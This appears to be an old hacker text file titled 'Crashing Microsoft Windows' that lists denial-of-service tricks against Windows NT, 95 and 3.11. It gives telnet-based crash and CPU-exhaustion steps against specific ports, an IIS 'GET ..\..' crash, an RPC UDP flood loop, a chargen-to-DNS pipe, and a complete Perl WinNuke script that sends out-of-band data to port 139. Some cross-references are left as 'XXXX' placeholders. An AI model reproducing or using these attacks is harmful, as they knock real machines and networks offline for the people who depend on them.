CRASHING MICROSOFT WINDOWS

CRASHING MICROSOFT WINDOWS

CONTENT

FREEZING MICROSOFT STACKS

Microsoft stacks can freeze by a premature expire of dud replies to DHCP lease information.

ISS 2.0 WWW SERVER ON WINDOWS NT

If you telnet to port 80 on a NT machine running IIS 2.0 and issue the command GET ..\.. it will crash.

THE DOT DOT BUG

Windows NT file sharing system is vulnerable to the under Windows 95 famous dot dot bug (dot dot like ..). Meaning that anyone can crash the system. If someone sends a "DIR ..\" to the workstation will a STOP messages appear on the screen on the Windows NT computer. Note that it applies to version 3.50 and 3.51 for both workstation and server version.

CONSUMING 100% OF CPU TIME ON NT MACHINES

Telnet to port 135 and send some random characters and disconnect. This will cause the rpcss.exe process to start consuming all available process cycles.

CONSUMING 100% OF CPU TIME ON NT MACHINES II

Telnet to port 6558 and type in one letter and hit enter.

CONSUMING 100% OF CPU TIME ON NT MACHINES III

Telnet to port 53 and send some random characters and disconnect.

WINDOWS NT 4.0 AND THE DNS SERVICE

The Microsoft DNS service terminates when it receives a response to a DNS query that was never made.

WINDOWS NT AND LARGE FILE CACHING

If the NT system have large file caching enable it is easy to eat 100% of the CPU time. Just transfer a large enough file from/to the server through the shared network drive.

CONSUMING 100% OF CPU TIME ON NT MACHINES - SOME MORE PORTS -

Also try 1031 and 1040.

FLOODING A MICROSOFT NT NETWORK

Port 135 is the RPC endpoint mapper and it is used by a number of applikcations. The point is that if you send UDP packets to the port it will send UDP packets back. So we can create a loop that will flood the network, almost like the unix attack XXXXXXXXXXX XXXXXXXXXXXXXX. Just send a packet from one NT machines port 135 to another NT machines port 135 in the same network.

TRUMPET WINSOCK V2.X AND SEVERAL OTHER SIMILAR PROGRAMS

Several (most ?) programs like Trumpet Winsock under Windows 3.11 can not handle large ping packets. Also have a look at section xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

SENDING OOB OUT OF BAND

You can cause denial of service to any Windows 95, Windows 3.11 (with Microsoft TCO/IP stack) or Windows NT machine running netbios, by sending Out Of Band data to an established connection with a windows user (send to the netbios port at 139).

The NT machine will try to reboot but this will consume all the memory, both the physical and the virtual. Only A proper shutdown and restart fixes the problem.

You can use the following perlscript to test the hole.





#!/usr/bin/perl

# Ghent - ghent@bounty-hunters.com - Perl version of winnuke.c by _eci



use strict; use Socket;

my($h,$p,$in_addr,$proto,$addr);



$h = "$ARGV[0]"; $p = 139 if (!$ARGV[1]);

if (!$h) { print "A hostname must be provided. Ex: www.microsoft.com\n"; }



$in_addr = (gethostbyname($h))[4]; $addr = sockaddr_in($p,$in_addr);

$proto = getprotobyname('tcp');

socket(S, AF_INET, SOCK_STREAM, $proto) or die $!;



connect(S,$addr) or die $!; select S; $| = 1; select STDOUT;



print "Nuking: $h:$p\n"; send S,"Sucker",MSG_OOB; print "Nuked!\n"; close S;



KILLING THE NT 4.0:S NAME SERVER

Just:

$ telnet ntbox 19 | telnet ntbox 53

WEB-SERVERS FOR PC

Some configurations on som Web-servers for PC are known to crash if you in a W3-client write the IP-number to the machine running the server.